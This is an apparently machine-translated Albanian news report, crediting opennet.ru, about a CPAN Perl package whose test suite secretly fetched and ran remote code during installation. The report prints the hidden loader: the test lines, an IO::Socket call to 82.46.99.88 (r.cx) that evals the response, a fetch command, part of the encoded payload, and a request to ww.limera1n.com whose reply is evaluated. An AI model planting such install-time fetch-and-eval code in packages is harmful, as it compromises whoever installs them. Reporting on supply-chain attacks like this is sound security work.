Në paketën Perl të shpërndarë përmes katalagut CPAN , e cila është e destinuar për ngarkimin automatik të moduleve CPAN në fluturim, kod i dëmshëm. Injektimi i dëmshëm u në kodin e testit , i cili është ofruar që nga viti 2011.
ĂshtĂ« e rĂ«ndĂ«sishme tĂ« theksohet se pyetjet pĂ«r ngarkimin e kodit tĂ« dyshimtĂ« kanĂ« lindur qĂ« nĂ« vitin 2016.
Aktiviteti i dëmshëm reduktohet në përpjekjen për të ngarkuar dhe ekzekutuar kod nga një server i jashtëm (http://r.cx:1/) gjatë ekzekutimit të paketës së testeve, e cila ekzekutohet gjatë instalimit të modulit. Supozohet se kodi fillimisht i ngarkuar nga serveri i jashtëm nuk ishte i dëmshëm, por tani kërkesa redirektohet në domenin ww.limera1n.com, i cili ofron pjesën e tij të kodit për ekzekutim.
Për të organizuar ngarkimin, në skedarin përdoret kodi në vijim:
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Kodi i dhënë çon në ekzekutimin e skriptit , përmbajtja e të cilit reduktohet në rreshtin:
use lib do{eval&&botstrap(«RCX»)if$b=new IO::Socket::INET 82.46.99.88.»:1âł};
Ky skript ngarkon me ndihmën e shërbimit kod nga hosti i jashtëm r.cx (kodet e simbolit 82.46.99.88 i korrespondon tekstit «R.cX») dhe e ekzekuton atë në bllokun eval.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.»:1âł; print ;'
eval unpack u=>q{_<'I;G1[)&(];F5W($E/.CI3;V-K970Z.DEâŠ.}
Pas dekompresimit, në fund ekzekutohet si vijon :
print{$b=new IO::Socket::INET»ww.limera1n.com:80âł}»GET /iJailBreak
«;evalor return warn$@while$b;1
Aktualisht paketa problematike është fshirë nga depoja (Perl Authors Upload Server), ndërsa llogaria e autorit të modulit është bllokuar. Megjithatë, moduli ende mbetet në arkiv të MetaCPAN dhe mund të instalohet drejtpërdrejt nga MetaCPAN me ndihmën e disa mjeteve, të tilla si cpanminus. , që paketa nuk është shpërndarë gjerësisht.
ĂshtĂ« interesante se nĂ« diskutim dhe autori i modulit, i cili hodhi poshtĂ« informacionin se kodi keqbĂ«rĂ«s ishte futur pas hackimit tĂ« faqes sĂ« tij "r.cx" dhe shpjegoi se ai thjesht po argĂ«tohej, dhe perlobfuscator.com nuk u pĂ«rdor pĂ«r tĂ« fshehur diçka, por pĂ«r tĂ« reduktuar madhĂ«sinĂ« e kodit dhe pĂ«r tĂ« lehtĂ«suar kopjimin e tij pĂ«rmes clipboard-it. Zgjedhja e emrit tĂ« funksionit "botstrap" Ă«shtĂ« shpjeguar si rezultat i faktit se kjo fjalĂ« "tingĂ«llon si bot dhe Ă«shtĂ« mĂ« e shkurtĂ«r se bootstrap". Autori i modulit gjithashtu e siguroi se manipulimet e identifikuara nuk kryejnĂ« veprime keqbĂ«rĂ«se, por thjesht demonstrojnĂ« ngarkimin dhe ekzekutimin e kodit pĂ«rmes TCP.
Burimi: opennet.ru
